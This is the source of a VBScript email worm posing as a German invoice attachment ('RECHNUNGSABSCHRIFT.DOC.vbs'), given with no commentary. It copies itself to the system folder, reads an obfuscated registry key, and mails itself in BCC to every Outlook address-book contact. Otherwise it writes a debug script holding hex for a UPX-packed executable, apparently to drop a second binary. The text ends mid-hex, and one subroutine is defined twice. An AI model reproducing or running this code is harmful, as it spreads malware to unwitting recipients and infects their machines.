On Error Resume Next
Set WshShell = WScript.CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
Set dirs = fso.GetSpecialFolder(1)
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
tc=file.ReadAll
set p=fso.OpenTextFile(dirs&"\RECHNUNGSABSCHRIFT.DOC.vbs",2,true)
p.write tc
p.close
Function d(i)
For j = 1 To Len(i) Step 2
d = d & Chr(Mid(i,j,2))
Next
End Function
reg=WshShell.RegRead(D("7275678592837970848765826992856683928566838073789279808473797883926865846580658472"))
t()
if reg="" then 
s()
cl()
else
h()
end if
sub s()
On Error Resume Next
dim x,a,c,e,m
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for c=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(c)
x=1
for e=1 to a.AddressEntries.Count
m=a.AddressEntries(x) & ";" & m
x=x+1
next
next
set male=out.CreateItem(0)
male.bcc = m
male.Subject = "Rechnungsabschrift"
male.Attachments.Add(dirs&"\RECHNUNGSABSCHRIFT.DOC.vbs")
male.DeleteAfterSubmit = True
male.Send
Set out=Nothing
Set mapi=Nothing
end sub
sub cl()
On Error Resume Next
set f2 = fso.GetFile(dirs&"\RECHNUNGSABSCHRIFT.DOC.vbs")
set f3 = fso.GetFile("RECHNUNGSABSCHRIFT.DOC")
f2.Delete
f3.Delete
end sub
sub cl()
On Error Resume Next
set f2 = fso.GetFile(dirs&"\RECHNUNGSABSCHRIFT.DOC.vbs")
f2.Delete
end sub
sub h()
On error resume next
Set f = fso.CreateTextFile("datax")
f.WriteLine ""
f.WriteLine "n startx"
f.WriteLine "e0100 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00"
f.WriteLine "e0110 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
f.WriteLine "e0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e0130 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00"
f.WriteLine "e0140 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68"
f.WriteLine "e0150 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f"
f.WriteLine "e0160 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20"
f.WriteLine "e0170 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00"
f.WriteLine "e0180 50 45 00 00 4c 01 03 00 7f df c0 39 00 00 00 00"
f.WriteLine "e0190 00 00 00 00 e0 00 0f 01 0b 01 05 00 00 30 00 00"
f.WriteLine "e01A0 00 10 00 00 00 80 00 00 80 b4 00 00 00 90 00 00"
f.WriteLine "e01B0 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00"
f.WriteLine "e01C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00"
f.WriteLine "e01D0 00 d0 00 00 00 02 00 00 00 00 00 00 02 00 00 00"
f.WriteLine "e01E0 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00"
f.WriteLine "e01F0 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e0200 64 c0 00 00 30 01 00 00 00 c0 00 00 64 00 00 00"
f.WriteLine "e0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e0270 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00"
f.WriteLine "e0280 00 80 00 00 00 10 00 00 00 00 00 00 00 02 00 00"
f.WriteLine "e0290 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0"
f.WriteLine "e02A0 55 50 58 31 00 00 00 00 00 30 00 00 00 90 00 00"
f.WriteLine "e02B0 00 26 00 00 00 02 00 00 00 00 00 00 00 00 00 00"
f.WriteLine "e02C0 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00"
f.WriteLine "e02D0 00 10 00 00 00 c0 00 00 00 02 00 00 00 28 00 00"
f.WriteLine "e02E0 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0"
f.WriteLine "e02F0 0a 00 24 49 6e 66 6f 3a 20 54 68 69 73 20 66 69"
f.WriteLine "e0300 6c 65 20 69 73 20 70 61 63 6b 65 64 20 77 69 74"
f.WriteLine "e0310 68 20 74 68 65 20 55 50 58 20 65 78 65 63 75 74"
f.WriteLine "e0320 61 62 6c 65 20 70 61 63 6b 65 72 20 68 74 74 70"
f.WriteLine "e0330 3a 2f 2f 75 70 78 2e 74 73 78 2e 6f 72 67 20 24"
f.WriteLine "e0340 0a 00 24 49 64 3a 20 55 50 58 20 31 2e 30 31 20"
f.WriteLine "e0350 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39"
f.WriteLine "e0360 39 36 2d 32 30 30 30 20 74 68 65 20 55 50 58 20"
f.WriteLine "e0370 54 65 61 6d 2e 20 41 6c 6c 20 52 69 67 68 74 73"
f.WriteLine "e0380 20 52 65 73 65 72 76 65 64 2e 20 24 0a 00 55 50"
f.WriteLine "e0390 58 21 0c 09 02 09 cd 1a 7d 00 60 c8 7a 39 ff 95"
f.WriteLine "e03A0 00 00 c9 23 00 00 00 5c 00 00 26 01 00 80 9f 79"
f.WriteLine "e03B0 ba ff 8b 44 24 08 0f b7 48 0c 51 04 0a 08 03 48"
f.WriteLine "e03C0 b9 bd 75 ff 02 ff 34 8d 34 50 40 00 0a 06 03 40"
f.WriteLine "e03D0 04 51 0f 85 18 dd b7 7f b7 68 c0 04 ff 74 24 24"
f.WriteLine "e03E0 ff 15 98 72 09 83 c4 24 c3 44 04 7f fb ff db 8b"
f.WriteLine "e03F0 4c 48 56 57 33 ff 2b c8 83 ff 02 74 0e 66 8b 10"
f.WriteLine "e0400 02 34 01 66 3b d6 77 ff ff bf fd 0f 72 12 47 40"
f.WriteLine "e0410 40 15 08 72 e5 33 c0 5f 5e c3 6a 01 58 eb f8 83"
f.WriteLine "e0420 c8 ff eb f3 55 8b ec ff 6f b7 f6 8b 4d 08 53 36"
f.WriteLine "e0430 5f 75 1a 03 41 0e 03 f0 bf e8 03 00 00 8b c6 b1"
f.WriteLine "e0440 b7 6f ff 33 d2 8b df 6a 3c f7 f3 09 66 89 51 0e"
f.WriteLine "e0450 0d f7 f7 5f 12 5a e9 ca ed 18 8b f0 27 45 18 2d"
f.WriteLine "e0460 0c 1e f9 5c d3 fd 22 8b f7 24 0c f6 23 1f 16 b6"
f.WriteLine "e0470 d3 0d 19 0a 42 0a 03 5f ff 91 b1 c1 40 14 20 08"
f.WriteLine "e0480 f7 8b 7d 0e 8b 45 0c 6b 9d 6e bb fd ff 1e 69 c0"
f.WriteLine "e0490 6d 01 7c 03 f8 14 5e 50 08 b7 bf 7d bb c3 75 12"
f.WriteLine "e04A0 10 66 03 79 06 03 f7 74 61 6a 02 5f 11 51 02 dd"
f.WriteLine "e04B0 36 dd 6f 3b c2 2b c7 74 1a 03 11 0d 83 b3 74 08"
f.WriteLine "e04C0 fd 6f db df 08 04 6a 1f eb 02 6a 1e dd 0b e7 66"
f.WriteLine "e04D0 39 01 0f 94 c0 83 c0 1c fe bf 6d bf 2b de 3b c3"
f.WriteLine "e04E0 72 09 50 71 42 33 f6 eb 19 66 83 fa 0c 75 0b 66"
f.WriteLine "e04F0 ff fe bb b7 17 1a c7 41 02 6e eb 05 42 6b 02 66"
f.WriteLine "e0500 2b f0 66 85 f6 75 a2 e1 42 f7 17 1e 5b 5d c3 81"
f.WriteLine "e0510 ec 90 87 53 1d 2d c0 60 76 d3 f0 82 1d bf a2 56"
f.WriteLine "e0520 76 e8 57 ff d5 bf c2 db ed db 59 28 59 bb 10 62"
f.WriteLine "e0530 0d 74 30 8f 6a ce 56 87 64 5b f8 c8 74 0c 56 6a"
f.WriteLine "e0540 32 5b 53 0e 70 4d f7 ef 42 7f 81 3d 25 04 31 74"
f.WriteLine "e0550 52 23 b4 59 67 b6 1f d8 68 e4 44 75 08 6a ff 18"
f.WriteLine "e0560 0c 38 b3 cd dd 36 6f e8 74 2b a4 46 98 05 37 32"
f.WriteLine "e0570 d8 db dc 68 32 06 20 08 84 5a ac 4d b7 a4 7b eb"
f.WriteLine "e0580 86 79 00 09 a8 3b cc 76 d8 ee 05 f2 55 65 7e 2a"
f.WriteLine "e0590 6f 57 07 04 e5 90 b9 c3 76 59 77 49 33 db 1f 66"
f.WriteLine "e05A0 9e b2 53 48 59 a3 fa 45 6a 10 68 3a f3 95 cd 12"
f.WriteLine "e05B0 62 b4 61 a4 9e 13 32 40 9e 0b 79 c4 22 e4 ef fe"
f.WriteLine "e05C0 b5 76 be 00 0b 48 0d 98 89 35 50 1d 59 be a2 58"
f.WriteLine "e05D0 d7 70 ef 6e 05 a3 48 0a 56 89 1d 4c 06 b3 1e 7f"
f.WriteLine "e05E0 7f e1 ff 92 85 c0 59 76 25 6a 03 8b c7 f7 59 f7"
f.WriteLine "e05F0 f1 0f be af 27 56 8b ca e1 1f bb f1 c1 e1 03 d3"
f.WriteLine "e0600 b8 dd 47 24 3b f8 59 72 db f7 c3 36 39 d9 ba 7f"
f.WriteLine "e0610 07 00 75 17 c6 05 54 3e 03 06 55 56 bd ff fb c2"
f.WriteLine "e0620 e1 8b c3 88 1d 18 c1 e8 08 c1 eb 10 a2 1c cf f0"
f.WriteLine "e0630 a5 af 10 1b 8d 26 10 50 68 01 db 4b de f4 f0 85"
f.WriteLine "e0640 56 eb 5d 5b 81 c4 ea c3 08 51 53 bb d0 97 de d3"
f.WriteLine "e0650 e0 f3 19 14 3d 99 7b 84 c2 7b 8c 50 68 04 39 fb"
f.WriteLine "e0660 68 05 1d 6c b6 b7 66 c0 8b 85 85 ff 59 1c 9d a0"
f.WriteLine "e0670 f0 df df ed 3f 29 d0 e8 a8 01 74 44 b9 39 15 37"
f.WriteLine "e0680 76 3a a1 df 8a f3 3b b6 fd 04 02 88 45 ff 8a 02"
f.WriteLine "e0690 02 a8 32 05 8a 8a 0d b1 ef de ee d2 c8 19 8b 0d"
f.WriteLine "e06A0 25 1f 88 04 0a 42 3b 39 76 38 c9 c7 72 c6 52 57"
f.WriteLine "e06B0 8b 35 a7 0f c3 af 15 de 35 1c b7 07 31 ff d6 b8"
f.WriteLine "e06C0 81 90 ec 43 57 c7 68 10 0e b8 d3 8d 3d c8 57 5e"
f.WriteLine "e06D0 83 25 c6 5f d5 10 fc c1 b5 70 5b c9 c3 50 74 27"
f.WriteLine "e06E0 8f 92 03 05 4c 67 bb 6f e3 34 50 78 05 13 03 82"
f.WriteLine "e06F0 19 59 1b c2 bf 67 99 50 a1 20 56 03 c8 51 cd 38"
f.WriteLine "e0700 b8 74 38 39 01 5e 36 2b 00 02 6d bf ab 64 e0 a6"
f.WriteLine "e0710 c5 46 02 50 8d 46 08 03 85 f3 7f b1 ad 92 00 50"
f.WriteLine "e0720 33 14 0f b7 4e 04 80 a4 05 e4 6b 2d bc d2 85 06"
f.WriteLine "e0730 df 24 fe 86 cd e7 06 04 18 23 fe 68 f8 6d ec d9"
f.WriteLine "e0740 cf 6c e9 08 1e aa 59 50 59 50 13 c9 95 2d 0d 4a"
f.WriteLine "e0750 f0 25 fe 7d d7 90 5c ec 59 fd 5e c9 c2 08 00 2f"
f.WriteLine "e0760 18 5e 8e bb a4 01 f6 05 f1 32 bd 37 80 3d dd dd"
f.WriteLine "e0770 4b 8e fc b8 d5 2e b8 9c 16 89 85 5c 4e 89 c2 e9"
f.WriteLine "e0780 b6 f6 45 fc 8d 45 8f 03 fc b1 5c 49 0b df b6 dc"
f.WriteLine "e0790 ec 2e 60 3b 12 1b c0 f7 d8 51 b0 b7 9f f1 c3 01"
f.WriteLine "e07A0 c9 08 b8 e0 45 57 cc 83 65 f4 e7 4d fc 81 c7 8f"
f.WriteLine "e07B0 a5 ff 56 be 51 57 56 52 b7 6e 87 0b e3 52 44 3d"
f.WriteLine "e07C0 e3 90 8b d8 4d 2e 2c 9c cb a1 d7 c5 0c 53 3b 08"
f.WriteLine "e07D0 df 6e d0 32 59 79 f0 75 0e 53 c8 56 e9 58 ac 75"
f.WriteLine "e07E0 91 7e 12 6f ff 75 f0 48 1b f4 31 33 4b d6 8e b6"
f.WriteLine "e07F0 16 19 75 f4 78 35 18 31 26 24 f5 a1 a0 f1 f6 b6"
f.WriteLine "e0800 c0 38 00 39 2c 76 31 8b 3f 8d 14 30 c6 19 ee b2"
f.WriteLine "e0810 9e 30 fb 8a 02 92 c0 a0 be 3d 8b 71 2a ac 19 46"
f.WriteLine "e0820 3b 2e 88 02 72 cf d6 95 1b ef 76 05 75 84 c0 f1"
f.WriteLine "e0830 c6 0b 7a 01 b2 c9 6c 87 bf 89 8c 83 f8 21 16 af"
f.WriteLine "e0840 d7 4a 23 9f 63 57 2c 16 86 ec a0 df da 74 c7 0d"
f.WriteLine "e0850 80 85 37 8e 8b 40 21 04 ff 30 eb 9f d0 d0 da 06"
f.WriteLine "e0860 8d 1b 08 53 d0 fe 66 a1 a2 8e 35 76 bd 5b b7 f8"
f.WriteLine "e0870 45 cc 4c 14 7a 66 be 6d 6b db 40 ce 21 cc 52 50"
f.WriteLine "e0880 d9 fc 46 74 c0 b2 c1 6c 85 47 88 cc fb 68 d9 dc"
f.WriteLine "e0890 60 ae 20 0b 1c 6e 71 64 29 e5 c1 3e 87 44 1d 00"
f.WriteLine "e08A0 24 bc 52 40 cc e6 3a 0b 0e d4 60 23 05 89 cf da"
f.WriteLine "e08B0 e9 40 fa 38 6c 68 8b 1d 49 6e ec b0 d9 16 5e b0"
f.WriteLine "e08C0 39 d3 96 6c b2 16 66 10 3a 50 a6 3e 12 c3 ce 7f"
f.WriteLine "e08D0 f2 6a 00 59 2b c6 50 8d 84 35 90 75 d6 c1 91 62"
f.WriteLine "e08E0 98 0a ce f0 2c 50 a7 b0 b6 9c bf f0 c2 37 c2 66"
f.WriteLine "e08F0 0a 74 47 32 25 ac 42 23 68 00 90 c1 0e 1c a9 98"
f.WriteLine "e0900 2a 79 14 72 ee 09 bc 09 16 18 f2 f2 98 09 bf a2"
f.WriteLine "e0910 5a 47 88 a9 90 01 c0 aa 43 ad 23 b9 92 11 84 ed"
f.WriteLine "e0920 11 9d fd ce 61 1b 7c 3d bc 59 11 59 8f 42 1e 90"
f.WriteLine "e0930 a6 9c 08 6a 08 3e 47 32 25 78 46 45 dc ce 76 c6"
f.WriteLine "e0940 e8 13 08 b1 20 0c 24 bd bb 4f e7 16 6e fa a6 f5"
f.WriteLine "e0950 b5 59 ff b5 1e 63 97 b8 f5 60 b6 f6 3c 99 55 f9"
f.WriteLine "e0960 8b 30 52 21 5c 18 df 6a c4 0c 50 f0 60 9b 09 e4"
f.WriteLine "e0970 15 c9 14 a7 07 32 19 a5 02 80 c6 ae 50 76 81 0d"
f.WriteLine "e0980 00 3f 67 57 62 90 03 80 0c 48 dc 06 00 76 20 25"
f.WriteLine "e0990 78 3c 66 4c 72 84 0c 75 59 2c 5d 20 03 80 0e be"
f.WriteLine "e09A0 cc 8d 33 0e c3 06 56 35 70 f3 7b 42 30 ce 0d 59"
f.WriteLine "e09B0 15 b9 68 14 82 38 64 90 0e 10 23 00 aa a5 6e f0"
f.WriteLine "e09C0 31 5d 59 c0 e8 04 5f 59 74 df e2 b3 70 8e 10 86"
f.WriteLine "e09D0 4a 2f fc be d4 d4 ee d6 6d 51 8b fc 13 a5 00 50"
f.WriteLine "e09E0 a5 16 00 79 3d 5f d7 d1 fe e8 64 50 07 e6 04 e4"
f.WriteLine "e09F0 de 14 8c 27 5b ec 85 45 e2 97 2a 18 83 6d 46 51"
f.WriteLine "e0A00 74 1c a8 90 06 cc 5d ab 68 dc 13 c5 aa a1 94 bc"
f.WriteLine "e0A10 b0 f7 68 d4 2c 12 a4 60 da 6a 21 d9 c0 25 44 59"
f.WriteLine "e0A20 22 35 3c 0a b6 3d a9 b5 2f 70 bc c0 62 4a 2e 05"
f.WriteLine "e0A30 6a f2 50 4d c2 0b 20 dd 85 ac 2e 2d 17 90 05 dc"
f.WriteLine "e0A40 f4 50 90 51 b8 57 21 0c b0 b1 c3 4a 16 22 24 90"
f.WriteLine "e0A50 04 80 7f 03 cf 2d da 56 22 bf 21 62 90 51 20 51"
f.WriteLine "e0A60 f3 6c 3f d8 85 db 14 aa 78 53 b9 d5 28 b2 bd 1c"
f.WriteLine "e0A70 bc f0 8d 00 b3 43 5d f3 20 ba 58 1b a3 22 0f d7"
f.WriteLine "e0A80 bd 21 58 fb 21 56 68 bd 14 cf ff 2a 85 84 be 45"
f.WriteLine "e0A90 56 4c d7 68 38 51 4c b3 65 c7 96 0c c9 3c 6a 1e"
f.WriteLine "e0AA0 c8 ec 0b 8b d4 a1 08 9a c8 81 03 00 27 bc ba c9"
f.WriteLine "e0AB0 dc ce c7 c4 9d 18 c6 bd 3d e4 09 84 24 51 8b 55"
f.WriteLine "e0AC0 1d 83 fa 02 db ff 77 b1 5d 30 b6 83 c0 02 83 c2"
f.WriteLine "e0AD0 fe 8a 08 80 f9 0d 74 05 04 0a ff 4f f6 16 63 8a"
f.WriteLine "e0AE0 48 fe 0c 0a 80 78 ff 2e 75 04 c6 40 ff 7f 40 5e"
f.WriteLine "e0AF0 91 f4 40 4a 75 d9 2e df 02 ae 2d 27 94 3e 26 f0"
f.WriteLine "e0B00 41 3a 43 b1 23 73 8f da a6 38 35 00 c8 c1 60 72"
f.WriteLine "e0B10 da 4d 10 51 64 b0 05 76 4e 90 63 08 51 58 9c 00"
f.WriteLine "e0B20 ea 01 03 86 b9 ab e4 b8 01 94 23 40 2e 90 09 c0"
f.WriteLine "e0B30 a6 43 68 c1 50 52 a7 6b 69 f0 95 96 01 23 35 d7"
f.WriteLine "e0B40 e8 22 84 d4 df 4d 39 83 eb 32 48 b0 59 53 5f e4"
f.WriteLine "e0B50 42 6a b0 29 53 5d 56 1c b9 25 11 86 09 a7 b0 20"
f.WriteLine "e0B60 c0 09 23 28 12 cb 36 46 72 b4 61 f7 5c 26 59 81"
f.WriteLine "e0B70 c8 02 1f a4 1b 16 13 18 98 c0 a5 21 1d b1 dd 03"
f.WriteLine "e0B80 1e b0 c2 3b 5d f0 0a b0 f8 6c ff 1d 0b 2a 14 81"
f.WriteLine "e0B90 8b 4d f4 2b d8 57 53 03 c8 9d 51 06 61 04 06 10"
f.WriteLine "e0BA0 24 10 36 73 b7 fa c9 7d a5 74 09 d8 f9 0e dc 83"
f.WriteLine "e0BB0 70 ab b0 74 08 68 5c a1 58 46 00 77 75 21 0b 80"
f.WriteLine "e0BC0 20 e9 c9 c2 04 7b c0 17 c0 2d e3 0c c6 06 01 26"
f.WriteLine "e0BD0 7f 37 c1 ef 7b 08 89 35 23 a3 b6 a1 00 c5 f6 3b"
f.WriteLine "e0BE0 c6 7a eb 48 c3 74 07 11 2c 0c 50 31 68 c6 15 e0"
f.WriteLine "e0BF0 d7 34 b8 11 2f 28 a3 24 5e 5d 00 6f 97 31 33 14"
f.WriteLine "e0C00 53 56 25 f4 57 50 2b 73 02 8c 5e f0 62 ec 1f 02"
f.WriteLine "e0C10 e6 33 9b ec c4 10 fd 77 bf f1 6d 86 d0 9b 08 d8"
f.WriteLine "e0C20 24 04 07 0f 8d 9a 00 64 c0 dc 2b 31 42 41 ec ec"
f.WriteLine "e0C30 85 0c 96 37 d8 7d 66 2f 92 c9 92 25 6d 67 c8 dc"
f.WriteLine "e0C40 08 f2 e5 20 06 0f 85 85 dd f0 fe 78 e5 3e d2 c4"
f.WriteLine "e0C50 d6 80 a5 ef 0d b2 ba 5d 6c 6f 36 46 7e 09 81 21"
f.WriteLine "e0C60 6c 91 eb 07 08 d0 60 b6 d1 60 29 33 c8 03 55 04"
f.WriteLine "e0C70 0d a6 d8 d9 bd b6 19 dc b7 5b dd 88 d3 ec 75 2b"
f.WriteLine "e0C80 de 7e 04 22 bb 38 7a 08 d6 01 9d 33 88 79 fc e2"
f.WriteLine "e0C90 bf fb 7f 34 74 19 83 c3 04 47 81 fb 68 1d 7c e0"
f.WriteLine "e0CA0 47 83 ff 07 7c b2 32 b6 ed 12 94 b9 be 66 8b 61"
f.WriteLine "e0CB0 47 3c 06 9a ee 3f ef 07 ec 66 89 46 f0 66 83 66"
f.WriteLine "e0CC0 0e 00 0c 08 f8 e1 bb a6 eb 58 02 0b 0a f4 07 0c"
f.WriteLine "e0CD0 b0 01 eb c6 72 15 62 80 1b 88 97 95 5b dd 06 27"
f.WriteLine "e0CE0 3e 9d 57 bf 1f 17 53 0a c7 6c a5 e6 0c 0d e8 d8"
f.WriteLine "e0CF0 0d 7f db d9 2e 97 6e fe 5d f8 66 32 05 2b df 07"
f.WriteLine "e0D00 2a 61 c9 5c aa 53 bf 78 f8 48 e4 95 fc bd a5 d2"
f.WriteLine "e0D10 16 f4 1d 10 cd 68 74 53 26 c3 87 3d 33 f8 3c 74"
f.WriteLine "e0D20 37 2b 5f 41 c0 b5 83 73 13 36 56 2f 8c 23 3c 7c"
f.WriteLine "e0D30 91 e0 0f 00 7c 43 4b 53 d6 b2 27 0b 14 c4 eb 11"
f.WriteLine "e0D40 2f 22 d6 75 18 70 59 74 a7 78 33 7d 67 ee c8 80"
f.WriteLine "e0D50 75 8f 17 99 50 0f d8 93 01 76 dc 75 20 13 80 3b"
f.WriteLine "e0D60 c7 1c 18 70 73 8a 2a 64 04 7f dc ed 80 61 f1 e4"
f.WriteLine "e0D70 a7 79 e0 02 42 3e 18 d0 c5 f0 7b e2 8d 45 e0 c7"
f.WriteLine "e0D80 1b 46 ee 21 42 c8 a6 13 9b 35 c2 66 78 f9 4c 53"
f.WriteLine "e0D90 dc 98 1d 14 c1 47 98 35 97 10 7e 25 8b c3 c5 21"
f.WriteLine "e0DA0 6b d6 2d c7 2e cb cd 03 7b c4 b2 77 ef 3b fb 7c"
f.WriteLine "e0DB0 db 37 e4 6e c9 e6 03 6e b2 1a 7a 78 f9 ff 03 cc"
f.WriteLine "e0DC0 fd 45 1e 93 03 1d 00 bf 3c 82 29 cd 36 84 d2 4f"
f.WriteLine "e0DD0 87 22 70 57 1e 96 78 02 4b 03 d8 bb 53 6e d6 e9"
f.WriteLine "e0DE0 9a 8d bf 3f 2b fb 57 72 bc 53 b7 e4 96 60 f2 82"
f.WriteLine "e0DF0 ce 3d bc fe 73 50 a6 2b fc cd 1c 8b 12 ed 59 80"
f.WriteLine "e0E00 4a 25 02 5f 13 72 19 21 a3 41 dc 09 1f 56 79 d1"
f.WriteLine "e0E10 02 33 33 db 53 a1 12 26 8c 4d ed 1f f0 5e 5b 14"
f.WriteLine "e0E20 0c 05 47 0d 7f 8d 8b c8 2b 61 20 83 71 af 02 b3"
f.WriteLine "e0E30 5c 21 17 14 f8 ff 6e 4e 20 4d c7 c3 5b 02 d8 3b"
f.WriteLine "e0E40 df c2 21 3c 58 bb cf 61 53 5d 66 ba 52 4b 42 6f"
f.WriteLine "e0E50 27 33 6e b7 80 79 08 39 50 f1 8d 0f 04 61 98 e3"
f.WriteLine "e0E60 2b c1 51 5b 2a 2f 42 32 26 46 e5 4c 1a 64 4f 98"
f.WriteLine "e0E70 74 3d 10 2f dd 01 55 60 66 a0 c9 08 92 29 74 30"
f.WriteLine "e0E80 d3 bd 8f 49 30 11 04 53 78 ed f4 61 ae 0f be 05"
f.WriteLine "e0E90 a9 83 78 bd f7 2c 70 0a d0 e0 40 10 2b 2e 06 05"
f.WriteLine "e0EA0 9b 26 4a 67 23 89 32 b6 9d c0 ae f8 7c 60 57 c2"
f.WriteLine "e0EB0 2b 51 7e fe 50 83 c6 04 11 bd af 4c 31 98 c1 56"
f.WriteLine "e0EC0 55 31 62 60 ba 34 12 0c 3d 74 32 97 41 ae 05 db"
f.WriteLine "e0ED0 39 74 11 f2 33 b5 39 84 21 d1 82 d2 07 02 04 ea"
f.WriteLine "e0EE0 ed 6e 84 a7 19 8f 31 8b 1d 1b 09 79 96 58 03 59"
f.WriteLine "e0EF0 1b cc 22 81 44 40 9e cc e4 bc e8 d7 26 e4 00 53"
f.WriteLine "e0F00 59 83 c1 74 25 30 70 43 1a 18 50 63 ef 21 60 f0"
f.WriteLine "e0F10 b5 82 d3 e0 da f2 95 76 66 44 99 5e 56 14 7a a4"
f.WriteLine "e0F20 ec 7d ef 3d bc 89 b5 14 cc 06 57 00 c1 f4 d1 26"
f.WriteLine "e0F30 da 25 25 fc 71 e1 5c 97 7d 6d 48 77 a8 ad 00 40"
f.WriteLine "e0F40 75 24 90 d8 f1 cc 83 ec 10 cf d6 1e b7 61 8b 56"
f.WriteLine "e0F50 49 46 ea c6 e9 39 09 13 6f a3 19 45 3f 04 17 09"
f.WriteLine "e0F60 89 82 a2 3d 7f 2f 48 38 f7 68 64 24 81 01 41 26"
f.WriteLine "e0F70 40 81 2d 12 40 82 20 c6 e4 c8 cd f0 b5 b0 2b 06"
f.WriteLine "e0F80 f4 9c f8 88 e4 e6 3a 72 fc 7c e0 00 20 06 e4 01"
f.WriteLine "e0F90 e2 92 39 72 e8 02 ec 03 a8 8d 7d a0 c4 04 da 3e"
f.WriteLine "e0FA0 37 ea a7 f8 ff 65 f0 f0 9b 74 10 43 83 c7 04 83"
f.WriteLine "e0FB0 fb 04 7c dc 33 6a 76 fb 33 73 8b f3 c1 e6 02 d5"
f.WriteLine "e0FC0 35 f0 30 a9 06 8e 37 31 8d 44 08 05 e4 9f 37 06"
f.WriteLine "e0FD0 37 3e 44 35 e0 97 eb d4 65 54 67 38 c0 a1 09 f0"
f.WriteLine "e0FE0 38 fc 0c 40 8a 2c d1 de 3a ac b4 9c 8c dc ec 0c"
f.WriteLine "e0FF0 14 7b 29 75 54 b6 84 1b 5a 41 b2 45 ac 56 6c 24"
f.WriteLine "e1000 37 c9 dd ca fd b5 ac 44 cb 1e 30 7b ed 24 4c 34"
f.WriteLine "e1010 ee ac 0e 00 4b dd 84 b3 36 36 2e 50 c4 28 0c 0c"
f.WriteLine "e1020 73 ac 35 5e be 97 04 01 65 c8 0d b3 05 33 fc 84"
f.WriteLine "e1030 a4 5f f6 27 46 e2 1a 2e 77 32 ea 68 3f 00 0f 1f"
f.WriteLine "e1040 1d b7 08 0c 6a 74 31 e8 71 92 a4 64 06 fb 99 5e"
f.WriteLine "e1050 0d ec 71 08 f0 6c 76 c6 a3 3f f6 af d6 35 a9 65"
f.WriteLine "e1060 63 2f c2 55 ab 08 18 73 33 2f ac b5 26 56 9c 0c"
f.WriteLine "e1070 02 bd a3 14 b0 66 f4 57 92 8f fb 62 6f 7f f8 75"
f.WriteLine "e1080 05 b8 bb 8d 4d f8 51 03 fc 51 57 9e ba b1 06 d8"
f.WriteLine "e1090 05 70 ae 8d 32 51 f2 e4 63 16 3d 60 32 9b 91 0e"
f.WriteLine "e10A0 b0 2d d0 df 86 c0 e8 05 f7 07 54 5d 20 75 be 1f"
f.WriteLine "e10B0 b8 a4 5b 86 f4 87 11 9a 7d b7 26 59 be d9 50 7f"
f.WriteLine "e10C0 50 d1 b1 af 41 b1 de dc 53 75 1f 61 f1 82 dd 29"
f.WriteLine "e10D0 01 75 19 36 26 ab eb eb 58 36 23 4f 1c 40 20 fe"
f.WriteLine "e10E0 5a 76 20 0c 16 45 d8 2d 5f f2 f0 82 f1 1c 54 57"
f.WriteLine "e10F0 1a a8 30 ec 25 a1 fc db 14 4f bd c3 06 eb d4 5d"
f.WriteLine "e1100 73 1a bf cc bb c1 b8 ac a4 82 6f 02 57 26 3c 72"
f.WriteLine "e1110 24 57 c6 48 4a 55 4a fe 20 4d f3 e3 50 a1 99 50"
f.WriteLine "e1120 50 fd d0 18 cf 91 71 14 5a fd 57 54 84 41 26 4b"
f.WriteLine "e1130 c5 00 00 f5 a4 17 3b 64 02 f4 c5 14 24 cd 2e 3d"
f.WriteLine "e1140 9c f6 05 94 01 27 75 51 19 ee 85 25 97 df 00 f1"
f.WriteLine "e1150 39 3d fe 27 49 4a f6 f1 76 26 be 02 50 36 1d 25"
f.WriteLine "e1160 3d 3a d6 c0 12 47 bf 3b 25 72 df 14 d2 c9 66 17"
f.WriteLine "e1170 80 eb f8 80 13 53 e1 31 a0 b9 e8 38 1d cb 9b ca"
f.WriteLine "e1180 96 6a 9e 45 d0 20 fd f8 03 fc c7 2c 8a 4d 10 d0"
f.WriteLine "e1190 3c 0b a6 89 dd b4 2a 39 5d b6 a5 31 80 ca fd 8e"
f.WriteLine "e11A0 99 fc 05 a0 00 da b5 24 2e ee 3e d1 dc 8e f8 61"
f.WriteLine "e11B0 c3 de 85 7d 27 8b 8d 84 df d7 54 6f 81 f9 01 20"
f.WriteLine "e11C0 2e 6b 11 85 28 39 57 6f 00 1a 6d 22 10 89 0d 64"
f.WriteLine "e11D0 27 db ee 1d bc 0c 1c 21 40 b8 00 28 3b c8 6d 46"
f.WriteLine "e11E0 f1 9a ed 3d 05 1c 36 3a a3 0a 85 47 1c 78 10 79"
f.WriteLine "e11F0 09 88 b3 11 87 46 70 95 24 ee 36 cf e2 29 a7 28"
f.WriteLine "e1200 07 80 ec 34 54 6e dd 42 8c 8c b4 18 d2 89 b8 53"
f.WriteLine "e1210 53 44 6e 6c c1 20 07 53 78 c8 55 61 6e 2b 02 d1"
f.WriteLine "e1220 86 53 23 1f 37 2b c5 cb 56 c7 06 e8 12 25 cd bf"
